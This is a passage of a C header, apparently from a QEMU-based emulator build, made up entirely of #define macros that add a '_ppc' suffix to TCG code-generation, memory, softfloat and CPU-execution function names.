tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_ppc #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_ppc #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_ppc #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_ppc #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_ppc #define tcg_gen_ld_i64 tcg_gen_ld_i64_ppc #define tcg_gen_mov_i64 tcg_gen_mov_i64_ppc #define tcg_gen_movi_i64 tcg_gen_movi_i64_ppc #define tcg_gen_mul_i64 tcg_gen_mul_i64_ppc #define tcg_gen_or_i64 tcg_gen_or_i64_ppc #define tcg_gen_sar_i64 tcg_gen_sar_i64_ppc #define tcg_gen_shl_i64 tcg_gen_shl_i64_ppc #define tcg_gen_shr_i64 tcg_gen_shr_i64_ppc #define tcg_gen_st_i64 tcg_gen_st_i64_ppc #define tcg_gen_xor_i64 tcg_gen_xor_i64_ppc #define cpu_icount_to_ns cpu_icount_to_ns_ppc #define cpu_is_stopped cpu_is_stopped_ppc #define cpu_get_ticks cpu_get_ticks_ppc #define cpu_get_clock cpu_get_clock_ppc #define cpu_resume cpu_resume_ppc #define qemu_init_vcpu qemu_init_vcpu_ppc #define cpu_stop_current cpu_stop_current_ppc #define resume_all_vcpus resume_all_vcpus_ppc #define vm_start vm_start_ppc #define address_space_dispatch_compact address_space_dispatch_compact_ppc #define flatview_translate flatview_translate_ppc #define address_space_translate_for_iotlb address_space_translate_for_iotlb_ppc #define qemu_get_cpu qemu_get_cpu_ppc #define cpu_address_space_init cpu_address_space_init_ppc #define cpu_get_address_space cpu_get_address_space_ppc #define cpu_exec_unrealizefn
cpu_exec_unrealizefn_ppc #define cpu_exec_initfn cpu_exec_initfn_ppc #define cpu_exec_realizefn cpu_exec_realizefn_ppc #define tb_invalidate_phys_addr tb_invalidate_phys_addr_ppc #define cpu_watchpoint_insert cpu_watchpoint_insert_ppc #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_ppc #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_ppc #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_ppc #define cpu_breakpoint_insert cpu_breakpoint_insert_ppc #define cpu_breakpoint_remove cpu_breakpoint_remove_ppc #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_ppc #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_ppc #define cpu_abort cpu_abort_ppc #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_ppc #define memory_region_section_get_iotlb memory_region_section_get_iotlb_ppc #define flatview_add_to_dispatch flatview_add_to_dispatch_ppc #define qemu_ram_get_host_addr qemu_ram_get_host_addr_ppc #define qemu_ram_get_offset qemu_ram_get_offset_ppc #define qemu_ram_get_used_length qemu_ram_get_used_length_ppc #define qemu_ram_is_shared qemu_ram_is_shared_ppc #define qemu_ram_pagesize qemu_ram_pagesize_ppc #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_ppc #define qemu_ram_alloc qemu_ram_alloc_ppc #define qemu_ram_free qemu_ram_free_ppc #define qemu_map_ram_ptr qemu_map_ram_ptr_ppc #define qemu_ram_block_host_offset qemu_ram_block_host_offset_ppc #define qemu_ram_block_from_host qemu_ram_block_from_host_ppc #define qemu_ram_addr_from_host qemu_ram_addr_from_host_ppc #define cpu_check_watchpoint cpu_check_watchpoint_ppc #define iotlb_to_section iotlb_to_section_ppc #define address_space_dispatch_new address_space_dispatch_new_ppc #define address_space_dispatch_free address_space_dispatch_free_ppc #define flatview_read_continue flatview_read_continue_ppc #define address_space_read_full address_space_read_full_ppc #define address_space_write address_space_write_ppc #define address_space_rw address_space_rw_ppc #define cpu_physical_memory_rw cpu_physical_memory_rw_ppc #define address_space_write_rom address_space_write_rom_ppc #define cpu_flush_icache_range cpu_flush_icache_range_ppc #define cpu_exec_init_all cpu_exec_init_all_ppc #define address_space_access_valid address_space_access_valid_ppc #define address_space_map address_space_map_ppc #define address_space_unmap address_space_unmap_ppc #define cpu_physical_memory_map cpu_physical_memory_map_ppc #define cpu_physical_memory_unmap cpu_physical_memory_unmap_ppc #define cpu_memory_rw_debug cpu_memory_rw_debug_ppc #define qemu_target_page_size qemu_target_page_size_ppc #define qemu_target_page_bits qemu_target_page_bits_ppc #define qemu_target_page_bits_min qemu_target_page_bits_min_ppc #define target_words_bigendian target_words_bigendian_ppc #define cpu_physical_memory_is_io cpu_physical_memory_is_io_ppc #define ram_block_discard_range ram_block_discard_range_ppc #define ramblock_is_pmem ramblock_is_pmem_ppc #define page_size_init page_size_init_ppc #define set_preferred_target_page_bits set_preferred_target_page_bits_ppc #define finalize_target_page_bits finalize_target_page_bits_ppc #define cpu_outb cpu_outb_ppc #define cpu_outw cpu_outw_ppc #define cpu_outl cpu_outl_ppc #define cpu_inb cpu_inb_ppc #define cpu_inw cpu_inw_ppc #define cpu_inl cpu_inl_ppc #define memory_map memory_map_ppc #define memory_map_io memory_map_io_ppc #define memory_map_ptr memory_map_ptr_ppc #define memory_cow memory_cow_ppc #define memory_unmap 
memory_unmap_ppc #define memory_moveout memory_moveout_ppc #define memory_movein memory_movein_ppc #define memory_free memory_free_ppc #define flatview_unref flatview_unref_ppc #define address_space_get_flatview address_space_get_flatview_ppc #define memory_region_transaction_begin memory_region_transaction_begin_ppc #define memory_region_transaction_commit memory_region_transaction_commit_ppc #define memory_region_init memory_region_init_ppc #define memory_region_access_valid memory_region_access_valid_ppc #define memory_region_dispatch_read memory_region_dispatch_read_ppc #define memory_region_dispatch_write memory_region_dispatch_write_ppc #define memory_region_init_io memory_region_init_io_ppc #define memory_region_init_ram_ptr memory_region_init_ram_ptr_ppc #define memory_region_size memory_region_size_ppc #define memory_region_set_readonly memory_region_set_readonly_ppc #define memory_region_get_ram_ptr memory_region_get_ram_ptr_ppc #define memory_region_from_host memory_region_from_host_ppc #define memory_region_get_ram_addr memory_region_get_ram_addr_ppc #define memory_region_add_subregion memory_region_add_subregion_ppc #define memory_region_del_subregion memory_region_del_subregion_ppc #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_ppc #define memory_region_find memory_region_find_ppc #define memory_region_filter_subregions memory_region_filter_subregions_ppc #define memory_listener_register memory_listener_register_ppc #define memory_listener_unregister memory_listener_unregister_ppc #define address_space_remove_listeners address_space_remove_listeners_ppc #define address_space_init address_space_init_ppc #define address_space_destroy address_space_destroy_ppc #define memory_region_init_ram memory_region_init_ram_ppc #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_ppc #define find_memory_mapping find_memory_mapping_ppc #define exec_inline_op exec_inline_op_ppc #define floatx80_default_nan floatx80_default_nan_ppc #define float_raise float_raise_ppc #define float16_is_quiet_nan float16_is_quiet_nan_ppc #define float16_is_signaling_nan float16_is_signaling_nan_ppc #define float32_is_quiet_nan float32_is_quiet_nan_ppc #define float32_is_signaling_nan float32_is_signaling_nan_ppc #define float64_is_quiet_nan float64_is_quiet_nan_ppc #define float64_is_signaling_nan float64_is_signaling_nan_ppc #define floatx80_is_quiet_nan floatx80_is_quiet_nan_ppc #define floatx80_is_signaling_nan floatx80_is_signaling_nan_ppc #define floatx80_silence_nan floatx80_silence_nan_ppc #define propagateFloatx80NaN propagateFloatx80NaN_ppc #define float128_is_quiet_nan float128_is_quiet_nan_ppc #define float128_is_signaling_nan float128_is_signaling_nan_ppc #define float128_silence_nan float128_silence_nan_ppc #define float16_add float16_add_ppc #define float16_sub float16_sub_ppc #define float32_add float32_add_ppc #define float32_sub float32_sub_ppc #define float64_add float64_add_ppc #define float64_sub float64_sub_ppc #define float16_mul float16_mul_ppc #define float32_mul float32_mul_ppc #define float64_mul float64_mul_ppc #define float16_muladd float16_muladd_ppc #define float32_muladd float32_muladd_ppc #define float64_muladd float64_muladd_ppc #define float16_div float16_div_ppc #define float32_div float32_div_ppc #define float64_div float64_div_ppc #define float16_to_float32 float16_to_float32_ppc #define float16_to_float64 float16_to_float64_ppc #define float32_to_float16 float32_to_float16_ppc #define float32_to_float64 
float32_to_float64_ppc #define float64_to_float16 float64_to_float16_ppc #define float64_to_float32 float64_to_float32_ppc #define float16_round_to_int float16_round_to_int_ppc #define float32_round_to_int float32_round_to_int_ppc #define float64_round_to_int float64_round_to_int_ppc #define float16_to_int16_scalbn float16_to_int16_scalbn_ppc #define float16_to_int32_scalbn float16_to_int32_scalbn_ppc #define float16_to_int64_scalbn float16_to_int64_scalbn_ppc #define float32_to_int16_scalbn float32_to_int16_scalbn_ppc #define float32_to_int32_scalbn float32_to_int32_scalbn_ppc #define float32_to_int64_scalbn float32_to_int64_scalbn_ppc #define float64_to_int16_scalbn float64_to_int16_scalbn_ppc #define float64_to_int32_scalbn float64_to_int32_scalbn_ppc #define float64_to_int64_scalbn float64_to_int64_scalbn_ppc #define float16_to_int16 float16_to_int16_ppc #define float16_to_int32 float16_to_int32_ppc #define float16_to_int64 float16_to_int64_ppc #define float32_to_int16 float32_to_int16_ppc #define float32_to_int32 float32_to_int32_ppc #define float32_to_int64 float32_to_int64_ppc #define float64_to_int16 float64_to_int16_ppc #define float64_to_int32 float64_to_int32_ppc #define float64_to_int64 float64_to_int64_ppc #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_ppc #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_ppc #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_ppc #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_ppc #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_ppc #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_ppc #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_ppc #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_ppc #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_ppc #define float16_to_uint16_scalbn float16_to_uint16_scalbn_ppc #define float16_to_uint32_scalbn float16_to_uint32_scalbn_ppc #define float16_to_uint64_scalbn float16_to_uint64_scalbn_ppc #define float32_to_uint16_scalbn float32_to_uint16_scalbn_ppc #define float32_to_uint32_scalbn float32_to_uint32_scalbn_ppc #define float32_to_uint64_scalbn float32_to_uint64_scalbn_ppc #define float64_to_uint16_scalbn float64_to_uint16_scalbn_ppc #define float64_to_uint32_scalbn float64_to_uint32_scalbn_ppc #define float64_to_uint64_scalbn float64_to_uint64_scalbn_ppc #define float16_to_uint16 float16_to_uint16_ppc #define float16_to_uint32 float16_to_uint32_ppc #define float16_to_uint64 float16_to_uint64_ppc #define float32_to_uint16 float32_to_uint16_ppc #define float32_to_uint32 float32_to_uint32_ppc #define float32_to_uint64 float32_to_uint64_ppc #define float64_to_uint16 float64_to_uint16_ppc #define float64_to_uint32 float64_to_uint32_ppc #define float64_to_uint64 float64_to_uint64_ppc #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_ppc #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_ppc #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_ppc #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_ppc #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_ppc #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_ppc #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_ppc #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_ppc #define float64_to_uint64_round_to_zero 
float64_to_uint64_round_to_zero_ppc #define int64_to_float16_scalbn int64_to_float16_scalbn_ppc #define int32_to_float16_scalbn int32_to_float16_scalbn_ppc #define int16_to_float16_scalbn int16_to_float16_scalbn_ppc #define int64_to_float16 int64_to_float16_ppc #define int32_to_float16 int32_to_float16_ppc #define int16_to_float16 int16_to_float16_ppc #define int64_to_float32_scalbn int64_to_float32_scalbn_ppc #define int32_to_float32_scalbn int32_to_float32_scalbn_ppc #define int16_to_float32_scalbn int16_to_float32_scalbn_ppc #define int64_to_float32 int64_to_float32_ppc #define int32_to_float32 int32_to_float32_ppc #define int16_to_float32 int16_to_float32_ppc #define int64_to_float64_scalbn int64_to_float64_scalbn_ppc #define int32_to_float64_scalbn int32_to_float64_scalbn_ppc #define int16_to_float64_scalbn int16_to_float64_scalbn_ppc #define int64_to_float64 int64_to_float64_ppc #define int32_to_float64 int32_to_float64_ppc #define int16_to_float64 int16_to_float64_ppc #define uint64_to_float16_scalbn uint64_to_float16_scalbn_ppc #define uint32_to_float16_scalbn uint32_to_float16_scalbn_ppc #define uint16_to_float16_scalbn uint16_to_float16_scalbn_ppc #define uint64_to_float16 uint64_to_float16_ppc #define uint32_to_float16 uint32_to_float16_ppc #define uint16_to_float16 uint16_to_float16_ppc #define uint64_to_float32_scalbn uint64_to_float32_scalbn_ppc #define uint32_to_float32_scalbn uint32_to_float32_scalbn_ppc #define uint16_to_float32_scalbn uint16_to_float32_scalbn_ppc #define uint64_to_float32 uint64_to_float32_ppc #define uint32_to_float32 uint32_to_float32_ppc #define uint16_to_float32 uint16_to_float32_ppc #define uint64_to_float64_scalbn uint64_to_float64_scalbn_ppc #define uint32_to_float64_scalbn uint32_to_float64_scalbn_ppc #define uint16_to_float64_scalbn uint16_to_float64_scalbn_ppc #define uint64_to_float64 uint64_to_float64_ppc #define uint32_to_float64 uint32_to_float64_ppc #define uint16_to_float64 uint16_to_float64_ppc #define float16_min float16_min_ppc #define float16_minnum float16_minnum_ppc #define float16_minnummag float16_minnummag_ppc #define float16_max float16_max_ppc #define float16_maxnum float16_maxnum_ppc #define float16_maxnummag float16_maxnummag_ppc #define float32_min float32_min_ppc #define float32_minnum float32_minnum_ppc #define float32_minnummag float32_minnummag_ppc #define float32_max float32_max_ppc #define float32_maxnum float32_maxnum_ppc #define float32_maxnummag float32_maxnummag_ppc #define float64_min float64_min_ppc #define float64_minnum float64_minnum_ppc #define float64_minnummag float64_minnummag_ppc #define float64_max float64_max_ppc #define float64_maxnum float64_maxnum_ppc #define float64_maxnummag float64_maxnummag_ppc #define float16_compare float16_compare_ppc #define float16_compare_quiet float16_compare_quiet_ppc #define float32_compare float32_compare_ppc #define float32_compare_quiet float32_compare_quiet_ppc #define float64_compare float64_compare_ppc #define float64_compare_quiet float64_compare_quiet_ppc #define float16_scalbn float16_scalbn_ppc #define float32_scalbn float32_scalbn_ppc #define float64_scalbn float64_scalbn_ppc #define float16_sqrt float16_sqrt_ppc #define float32_sqrt float32_sqrt_ppc #define float64_sqrt float64_sqrt_ppc #define float16_default_nan float16_default_nan_ppc #define float32_default_nan float32_default_nan_ppc #define float64_default_nan float64_default_nan_ppc #define float128_default_nan float128_default_nan_ppc #define float16_silence_nan float16_silence_nan_ppc #define 
float32_silence_nan float32_silence_nan_ppc #define float64_silence_nan float64_silence_nan_ppc #define float16_squash_input_denormal float16_squash_input_denormal_ppc #define float32_squash_input_denormal float32_squash_input_denormal_ppc #define float64_squash_input_denormal float64_squash_input_denormal_ppc #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_ppc #define roundAndPackFloatx80 roundAndPackFloatx80_ppc #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_ppc #define int32_to_floatx80 int32_to_floatx80_ppc #define int32_to_float128 int32_to_float128_ppc #define int64_to_floatx80 int64_to_floatx80_ppc #define int64_to_float128 int64_to_float128_ppc #define uint64_to_float128 uint64_to_float128_ppc #define float32_to_floatx80 float32_to_floatx80_ppc #define float32_to_float128 float32_to_float128_ppc #define float32_rem float32_rem_ppc #define float32_exp2 float32_exp2_ppc #define float32_log2 float32_log2_ppc #define float32_eq float32_eq_ppc #define float32_le float32_le_ppc #define float32_lt float32_lt_ppc #define float32_unordered float32_unordered_ppc #define float32_eq_quiet float32_eq_quiet_ppc #define float32_le_quiet float32_le_quiet_ppc #define float32_lt_quiet float32_lt_quiet_ppc #define float32_unordered_quiet float32_unordered_quiet_ppc #define float64_to_floatx80 float64_to_floatx80_ppc #define float64_to_float128 float64_to_float128_ppc #define float64_rem float64_rem_ppc #define float64_log2 float64_log2_ppc #define float64_eq float64_eq_ppc #define float64_le float64_le_ppc #define float64_lt float64_lt_ppc #define float64_unordered float64_unordered_ppc #define float64_eq_quiet float64_eq_quiet_ppc #define float64_le_quiet float64_le_quiet_ppc #define float64_lt_quiet float64_lt_quiet_ppc #define float64_unordered_quiet float64_unordered_quiet_ppc #define floatx80_to_int32 floatx80_to_int32_ppc #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_ppc #define floatx80_to_int64 floatx80_to_int64_ppc #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_ppc #define floatx80_to_float32 floatx80_to_float32_ppc #define floatx80_to_float64 floatx80_to_float64_ppc #define floatx80_to_float128 floatx80_to_float128_ppc #define floatx80_round floatx80_round_ppc #define floatx80_round_to_int floatx80_round_to_int_ppc #define floatx80_add floatx80_add_ppc #define floatx80_sub floatx80_sub_ppc #define floatx80_mul floatx80_mul_ppc #define floatx80_div floatx80_div_ppc #define floatx80_rem floatx80_rem_ppc #define floatx80_sqrt floatx80_sqrt_ppc #define floatx80_eq floatx80_eq_ppc #define floatx80_le floatx80_le_ppc #define floatx80_lt floatx80_lt_ppc #define floatx80_unordered floatx80_unordered_ppc #define floatx80_eq_quiet floatx80_eq_quiet_ppc #define floatx80_le_quiet floatx80_le_quiet_ppc #define floatx80_lt_quiet floatx80_lt_quiet_ppc #define floatx80_unordered_quiet floatx80_unordered_quiet_ppc #define float128_to_int32 float128_to_int32_ppc #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_ppc #define float128_to_int64 float128_to_int64_ppc #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_ppc #define float128_to_uint64 float128_to_uint64_ppc #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_ppc #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_ppc #define float128_to_uint32 float128_to_uint32_ppc #define float128_to_float32 float128_to_float32_ppc #define float128_to_float64 float128_to_float64_ppc #define 
float128_to_floatx80 float128_to_floatx80_ppc #define float128_round_to_int float128_round_to_int_ppc #define float128_add float128_add_ppc #define float128_sub float128_sub_ppc #define float128_mul float128_mul_ppc #define float128_div float128_div_ppc #define float128_rem float128_rem_ppc #define float128_sqrt float128_sqrt_ppc #define float128_eq float128_eq_ppc #define float128_le float128_le_ppc #define float128_lt float128_lt_ppc #define float128_unordered float128_unordered_ppc #define float128_eq_quiet float128_eq_quiet_ppc #define float128_le_quiet float128_le_quiet_ppc #define float128_lt_quiet float128_lt_quiet_ppc #define float128_unordered_quiet float128_unordered_quiet_ppc #define floatx80_compare floatx80_compare_ppc #define floatx80_compare_quiet floatx80_compare_quiet_ppc #define float128_compare float128_compare_ppc #define float128_compare_quiet float128_compare_quiet_ppc #define floatx80_scalbn floatx80_scalbn_ppc #define float128_scalbn float128_scalbn_ppc #define softfloat_init softfloat_init_ppc #define tcg_optimize tcg_optimize_ppc #define gen_new_label gen_new_label_ppc #define tcg_can_emit_vec_op tcg_can_emit_vec_op_ppc #define tcg_expand_vec_op tcg_expand_vec_op_ppc #define tcg_register_jit tcg_register_jit_ppc #define tcg_tb_insert tcg_tb_insert_ppc #define tcg_tb_remove tcg_tb_remove_ppc #define tcg_tb_lookup tcg_tb_lookup_ppc #define tcg_tb_foreach tcg_tb_foreach_ppc #define tcg_nb_tbs tcg_nb_tbs_ppc #define tcg_region_reset_all tcg_region_reset_all_ppc #define tcg_region_init tcg_region_init_ppc #define tcg_code_size tcg_code_size_ppc #define tcg_code_capacity tcg_code_capacity_ppc #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_ppc #define tcg_malloc_internal tcg_malloc_internal_ppc #define tcg_pool_reset tcg_pool_reset_ppc #define tcg_context_init tcg_context_init_ppc #define tcg_tb_alloc tcg_tb_alloc_ppc #define tcg_prologue_init tcg_prologue_init_ppc #define tcg_func_start tcg_func_start_ppc #define tcg_set_frame tcg_set_frame_ppc #define tcg_global_mem_new_internal tcg_global_mem_new_internal_ppc #define tcg_temp_new_internal tcg_temp_new_internal_ppc #define tcg_temp_new_vec tcg_temp_new_vec_ppc #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_ppc #define tcg_temp_free_internal tcg_temp_free_internal_ppc #define tcg_const_i32 tcg_const_i32_ppc #define tcg_const_i64 tcg_const_i64_ppc #define tcg_const_local_i32 tcg_const_local_i32_ppc #define tcg_const_local_i64 tcg_const_local_i64_ppc #define tcg_op_supported tcg_op_supported_ppc #define tcg_gen_callN tcg_gen_callN_ppc #define tcg_op_remove tcg_op_remove_ppc #define tcg_emit_op tcg_emit_op_ppc #define tcg_op_insert_before tcg_op_insert_before_ppc #define tcg_op_insert_after tcg_op_insert_after_ppc #define tcg_cpu_exec_time tcg_cpu_exec_time_ppc #define tcg_gen_code tcg_gen_code_ppc #define tcg_gen_op1 tcg_gen_op1_ppc #define tcg_gen_op2 tcg_gen_op2_ppc #define tcg_gen_op3 tcg_gen_op3_ppc #define tcg_gen_op4 tcg_gen_op4_ppc #define tcg_gen_op5 tcg_gen_op5_ppc #define tcg_gen_op6 tcg_gen_op6_ppc #define tcg_gen_mb tcg_gen_mb_ppc #define tcg_gen_addi_i32 tcg_gen_addi_i32_ppc #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_ppc #define tcg_gen_subi_i32 tcg_gen_subi_i32_ppc #define tcg_gen_andi_i32 tcg_gen_andi_i32_ppc #define tcg_gen_ori_i32 tcg_gen_ori_i32_ppc #define tcg_gen_xori_i32 tcg_gen_xori_i32_ppc #define tcg_gen_shli_i32 tcg_gen_shli_i32_ppc #define tcg_gen_shri_i32 tcg_gen_shri_i32_ppc #define tcg_gen_sari_i32 tcg_gen_sari_i32_ppc #define tcg_gen_brcond_i32 
tcg_gen_brcond_i32_ppc #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_ppc #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_ppc #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_ppc #define tcg_gen_muli_i32 tcg_gen_muli_i32_ppc #define tcg_gen_div_i32 tcg_gen_div_i32_ppc #define tcg_gen_rem_i32 tcg_gen_rem_i32_ppc #define tcg_gen_divu_i32 tcg_gen_divu_i32_ppc #define tcg_gen_remu_i32 tcg_gen_remu_i32_ppc #define tcg_gen_andc_i32 tcg_gen_andc_i32_ppc #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_ppc #define tcg_gen_nand_i32 tcg_gen_nand_i32_ppc #define tcg_gen_nor_i32 tcg_gen_nor_i32_ppc #define tcg_gen_orc_i32 tcg_gen_orc_i32_ppc #define tcg_gen_clz_i32 tcg_gen_clz_i32_ppc #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_ppc #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_ppc #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_ppc #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_ppc #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_ppc #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_ppc #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_ppc #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_ppc #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_ppc #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_ppc #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_ppc #define tcg_gen_extract_i32 tcg_gen_extract_i32_ppc #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_ppc #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_ppc #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_ppc #define tcg_gen_add2_i32 tcg_gen_add2_i32_ppc #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_ppc #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_ppc #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_ppc #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_ppc #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_ppc #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_ppc #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_ppc #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_ppc #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_ppc #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_ppc #define tcg_gen_smin_i32 tcg_gen_smin_i32_ppc #define tcg_gen_umin_i32 tcg_gen_umin_i32_ppc #define tcg_gen_smax_i32 tcg_gen_smax_i32_ppc #define tcg_gen_umax_i32 tcg_gen_umax_i32_ppc #define tcg_gen_abs_i32 tcg_gen_abs_i32_ppc #define tcg_gen_addi_i64 tcg_gen_addi_i64_ppc #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_ppc #define tcg_gen_subi_i64 tcg_gen_subi_i64_ppc #define tcg_gen_andi_i64 tcg_gen_andi_i64_ppc #define tcg_gen_ori_i64 tcg_gen_ori_i64_ppc #define tcg_gen_xori_i64 tcg_gen_xori_i64_ppc #define tcg_gen_shli_i64 tcg_gen_shli_i64_ppc #define tcg_gen_shri_i64 tcg_gen_shri_i64_ppc #define tcg_gen_sari_i64 tcg_gen_sari_i64_ppc #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_ppc #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_ppc #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_ppc #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_ppc #define tcg_gen_muli_i64 tcg_gen_muli_i64_ppc #define tcg_gen_div_i64 tcg_gen_div_i64_ppc #define tcg_gen_rem_i64 tcg_gen_rem_i64_ppc #define tcg_gen_divu_i64 tcg_gen_divu_i64_ppc #define tcg_gen_remu_i64 tcg_gen_remu_i64_ppc #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_ppc #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_ppc #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_ppc #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_ppc #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_ppc #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_ppc #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_ppc #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_ppc #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_ppc #define tcg_gen_not_i64 tcg_gen_not_i64_ppc #define tcg_gen_andc_i64 
tcg_gen_andc_i64_ppc #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_ppc #define tcg_gen_nand_i64 tcg_gen_nand_i64_ppc #define tcg_gen_nor_i64 tcg_gen_nor_i64_ppc #define tcg_gen_orc_i64 tcg_gen_orc_i64_ppc #define tcg_gen_clz_i64 tcg_gen_clz_i64_ppc #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_ppc #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_ppc #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_ppc #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_ppc #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_ppc #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_ppc #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_ppc #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_ppc #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_ppc #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_ppc #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_ppc #define tcg_gen_extract_i64 tcg_gen_extract_i64_ppc #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_ppc #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_ppc #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_ppc #define tcg_gen_add2_i64 tcg_gen_add2_i64_ppc #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_ppc #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_ppc #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_ppc #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_ppc #define tcg_gen_smin_i64 tcg_gen_smin_i64_ppc #define tcg_gen_umin_i64 tcg_gen_umin_i64_ppc #define tcg_gen_smax_i64 tcg_gen_smax_i64_ppc #define tcg_gen_umax_i64 tcg_gen_umax_i64_ppc #define tcg_gen_abs_i64 tcg_gen_abs_i64_ppc #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_ppc #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_ppc #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_ppc #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_ppc #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_ppc #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_ppc #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_ppc #define tcg_gen_exit_tb tcg_gen_exit_tb_ppc #define tcg_gen_goto_tb tcg_gen_goto_tb_ppc #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_ppc #define check_exit_request check_exit_request_ppc #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_ppc #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_ppc #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_ppc #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_ppc #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_ppc #define 